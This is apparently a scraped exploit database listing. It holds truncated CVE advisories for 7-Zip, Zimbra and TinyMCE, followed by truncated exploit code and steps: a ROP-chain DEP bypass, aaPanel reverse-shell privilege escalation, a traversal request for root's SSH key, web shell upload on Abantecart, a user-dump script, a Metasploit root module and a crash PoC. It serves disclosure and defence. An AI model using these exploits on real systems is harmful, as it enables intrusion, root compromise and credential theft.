?day POC 漏洞数据库

7-Zip: CVE-2023-40481: CWE-787 Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 05/03/2024 Created 12/20/2024 Added 12/19/2024 Modified 12/19/2024 Description 7-Zip SquashFS File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SQFS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past t…

7-Zip: CVE-2023-52168: Heap-based Buffer Overflow Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 07/03/2023 Created 07/31/2024 Added 07/30/2024 Modified 07/31/2024 Description The NtfsHandler.cpp NTFS handler in 7-Zip before 24.01 (for 7zz) contains a heap-based buffer overflow that allows an attacker to overwrite two bytes at multiple offsets beyond the allocated buffer size: buffer+512*i-2, for i=9, i=10, i=11, etc. Solution(s) 7-zip-7-zip-upgrade-latest References https://attackerkb.com/topics/cve-2023-52168 CVE - 2023-52168 https://nvd.nist.gov/vuln/detail/CVE-2023-52168 https://www.7-zip.org/download.html

7-Zip: CVE-2023-52169: Buffer Over-read Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 07/03/2023 Created 07/31/2024 Added 07/30/2024 Modified 07/31/2024 Description The NtfsHandler.cpp NTFS handler in 7-Zip before 24.01 (for 7zz) contains an out-of-bounds read that allows an attacker to read beyond the intended buffer. The bytes read beyond the intended buffer are presented as a part of a filename listed in the file system image. This has security relevance in some known web-service use cases where untrusted users can upload files and have them extracted by a server-side 7-Zip process. Solution(s) 7-zip-7-zip-upgrade-latest …

7-Zip: CVE-2024-11477: CWE-191 Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 11/22/2024 Created 11/26/2024 Added 11/25/2024 Modified 12/19/2024 Description 7-Zip Zstandard Decompression Integer Underflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the implementation of Zstandard decompression. The issue results from the lack of proper validation of user-supplied data, which can res…

7-Zip: CVE-2024-11612: CWE-835 Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 11/22/2024 Created 11/26/2024 Added 11/25/2024 Modified 12/19/2024 Description 7-Zip CopyCoder Infinite Loop Denial-of-Service Vulnerability. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of 7-Zip. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the processing of streams. The issue results from a logic error that can lead to an infinite loop. An attacker can leverage this vulnerability t…

7-Zip: CVE-2025-0411: CWE-693 Severity 6 CVSS (AV:L/AC:H/Au:N/C:C/I:C/A:C) Published 01/25/2025 Created 01/30/2025 Added 01/29/2025 Modified 02/13/2025 Description 7-Zip Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archived files. When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web …

A Cross-Site Scripting (XSS) issue that allowed an attacker to inject and execute malicious code via email account configurations has been resolved. Severity 5 CVSS (AV:N/AC:L/Au:M/C:P/I:P/A:N) Published 11/21/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description In Zimbra Collaboration (ZCS) 9.0 and 10.0, a vulnerability in the Webmail Modern UI allows execution of stored Cross-Site Scripting (XSS) payloads. An attacker with administrative access to the Zimbra Administration Panel can inject malicious JavaScript code while configuring an email account. This injected code is stored on the server and executed in the context of the …

A Cross-Site Scripting (XSS) vulnerability caused by a non-sanitized `packages` parameter has been resolved. Severity 5 CVSS (AV:N/AC:L/Au:S/C:P/I:P/A:N) Published 11/21/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description An issue was discovered in Zimbra Collaboration (ZCS) through v10.1. A Cross-Site Scripting (XSS) vulnerability exists in one of the endpoints of Zimbra Webmail due to insufficient sanitization of the packages parameter. Attackers can bypass the existing checks by using encoded characters, allowing the injection and execution of arbitrary JavaScript within a victim's session. Solution(s) zimbra-co…

A Cross-Site Scripting (XSS) vulnerability in TinyMCE was addressed in the upgrade from version 7.1.1 to 7.2.0 Severity 6 CVSS (AV:N/AC:L/Au:N/C:P/I:P/A:N) Published 01/20/2025 Created 01/16/2025 Added 01/20/2025 Modified 01/20/2025 Description TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s content extraction code. When using the `noneditable_regexp` option, specially crafted HTML attributes containing malicious code were able to be executed when content was extracted from the editor. This vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensur…

A cross-site scripting (XSS) vulnerability that was present in the in the Zimbra Classic Web Client has been addressed. Severity 6 CVSS (AV:N/AC:L/Au:N/C:P/I:P/A:N) Published 07/31/2023 Created 01/24/2024 Added 01/23/2024 Modified 01/20/2025 Description Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client. Solution(s) zimbra-collaboration-upgrade-latest References https://attackerkb.com/topics/cve-2023-37580 CVE - 2023-37580 https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy http://www.openwall.com/lists/oss-security/2023…

A Cross-Site Scripting (XSS) vulnerability via crafted <img> HTML content in the Zimbra Classic UI has been fixed. LC attribute zimbra_owasp_strip_alt_tags_with_handlers introduced in previous patch is no longer required and has been removed. Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:C/A:N) Published 01/20/2025 Created 01/16/2025 Added 01/20/2025 Modified 01/20/2025 Description No document with this CVE id exists in the DB. Solution(s) zimbra-collaboration-upgrade-latest References https://attackerkb.com/topics/cve-2024-45516 CVE - 2024-45516

A Local File Inclusion (LFI) vulnerability in the /h/rest endpoint, allowing authorized remote attackers to access sensitive files in the WebRoot using their valid auth tokens, has been fixed to prevent unauthorized file access. Severity 8 CVSS (AV:N/AC:L/Au:N/C:C/I:N/A:N) Published 12/19/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description An issue was discovered in the Webmail Classic UI in Zimbra Collaboration (ZCS) 9.0 and 10.0 and 10.1. A Local File Inclusion (LFI) vulnerability exists in the /h/rest endpoint, allowing authenticated remote attackers to include and access sensitive files in the WebRoot directory. Exploitation…

A possible Cross-site Scripting (XSS) security vulnerability has been fixed Severity 9 CVSS (AV:N/AC:L/Au:S/C:C/I:C/A:C) Published 07/06/2023 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. Solution(s) zimbra-collaboration-upgrade-latest References https://attackerkb.com/topics/cve-2023-34192 CVE - 2023-34192 https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.…

A reflected XSS vulnerability in the calendar endpoint has been addressed. Severity 6 CVSS (AV:N/AC:L/Au:N/C:P/I:P/A:N) Published 11/07/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description A reflected Cross-Site Scripting (XSS) vulnerability has been identified in Zimbra Collaboration Suite (ZCS) 8.8.15, affecting one of the webmail calendar endpoints. This arises from improper handling of user-supplied input, allowing an attacker to inject malicious code that is reflected back in the HTML response. Solution(s) zimbra-collaboration-upgrade-latest References https://attackerkb.com/topics/cve-2024-50599 C…

A security related issue has been fixed which impacted one of the third party libraries being used in Admin User Inferface. Severity 5 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:P) Published 01/20/2025 Created 01/16/2025 Added 01/20/2025 Modified 01/21/2025 Description This affects the package chart.js before 2.9.4. The options parameter is not properly sanitized when it is processed. When the options are processed, the existing options (or the defaults options) are deeply merged with provided options. However, during this operation, the keys of the object being set are not checked, leading to a prototype pollution. Solution(s) zimbra-collaboratio…

A Server-Side Request Forgery (SSRF) vulnerability that allowed unauthorized access to internal services has been addressed. Severity 7 CVSS (AV:N/AC:H/Au:S/C:C/I:C/A:C) Published 10/22/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/21/2025 Description An issue was discovered in Zimbra Collaboration (ZCS) 10.1.x before 10.1.1, 10.0.x before 10.0.9, 9.0.0 before Patch 41, and 8.8.15 before Patch 46. It allows authenticated users to exploit Server-Side Request Forgery (SSRF) due to improper input sanitization and misconfigured domain whitelisting. This issue permits unauthorized HTTP requests to be sent to internal services, which can lead to Re…

A stored XSS vulnerability in the `contacts/print` endpoint has been addressed. Severity 5 CVSS (AV:N/AC:L/Au:M/C:P/I:P/A:N) Published 11/21/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description An issue was discovered in Zimbra Collaboration (ZCS) through 10.1. A stored Cross-Site Scripting (XSS) vulnerability exists in the /modern/contacts/print endpoint of Zimbra webmail. This allows an attacker to inject and execute arbitrary JavaScript code in the context of the victim's browser when a crafted vCard (VCF) file is processed and printed. This could lead to unauthorized actions within the victim's session. Solution(…

#!/usr/bin/python # Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain # Date: 16 November 2023 # Exploit Author: George Washington # Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm # Software Link: http://www.a-pdf.com/all-to-mp3/download.htm # Version: 2.0.0 # Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64 # Based on: https://www.exploit-db.com/exploits/17275 # Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe # Video: https://youtu.be/_JEgdKjbtpI import socket, struct file = "1.wav" size = 8000 ############ Parameters for HeapCreate() ####…

# Exploit Title: [aaPanel 6.6.6 - Authenticated Privilege Escalation] # Google Dork: [] # Date: [04.05.2020] # Exploit Author: [Ünsal Furkan Harani (Zemarkhos)] # Vendor Homepage: [https://www.aapanel.com/](https://www.aapanel.com/) # Software Link: [https://github.com/aaPanel/aaPanel](https://github.com/aaPanel/aaPanel) # Version: [6.6.6] (REQUIRED) # Tested on: [Linux ubuntu 4.4.0-131-generic #157-Ubuntu SMP Thu Jul 12 15:51:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux] # CVE : [CVE-2020-14421] if you are logged was admin; 1- go to the crontab 2- select shell script and paste your reverse shell code 3- click execute button and you are now root. because crontab.py run…

# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated) # Date: 22.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.aapanel.com/ # Software Link: https://www.aapanel.com # Version: 6.8.21 # Tested on: Ubuntu Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa) #Go to App Store #Click to "install" in any free plugin. #Change installation script to ../../../root/.ssh/id_rsa POST /ajax?action=get_lines HTTP/1.1 Host: IP:7800 Content-Length: 41 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Geck…

# Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 3rd Mar'2022 # CVE ID: CVE-2022-26521 # Confirmed on release 1.3.2 # Vendor: https://www.abantecart.com/download ############################################### #Step1- Login with Admin Credentials #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions #Step3- Now Goto Add Media=>Add Resource=> Upload php web shell #Step4- Copy the Resource URL location and execute it in the brows…

# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information # Date: 2023-03-31 # Exploit Author: Paul Smith # Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series # Version: ABB Flow-X all versions before V4.00 # Tested on: Kali Linux # CVE: CVE-2023-1258 #!/usr/bin/python import sys import re from bs4 import BeautifulSoup as BS import lxml import requests # Set the request parameter url = sys.argv[1] def dump_users(): response = requests.get(url) # Check for HTTP codes other than 200 if response.status_code != 200: print('Status:', response.status_code, 'Headers:', response.headers, 'Err…

Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow Date: 2019-08-13 Exploit Author: Carter Yagemann <[email protected]> Vendor Homepage: https://abcnotation.com/abc2mtex/ Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz Version: 1.6.1 Tested on: Debian Buster An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return address from the openIn function by providing a long input filename. This carries similar risk to CVE-2004-1257. Setup: $ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz $ tar -xzf abc2mtex1.6.1.tar.gz $ make $ gcc --…

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ABRT sosreport Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges on RHEL systems with a vulnerable version of Automatic…

#Exploit Title: AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-19 #Vendor Homepage: https://www.celestialsoftware.net/ #Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet10.16.exe #Tested Version: 10.16 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: AbsoluteTelent.py #2.- Open AbsoluteTelent.txt and copy content to clipboard #3.- Open AbsoluteTelnet.exe #4.- Select "Help" > "Enter License Key" #5.- In "License Name" paste Clipboard #6.- Crashed cod = "\x41" * 2500 f = open('AbsoluteTelent.txt', 'w') f.write(cod) f.close()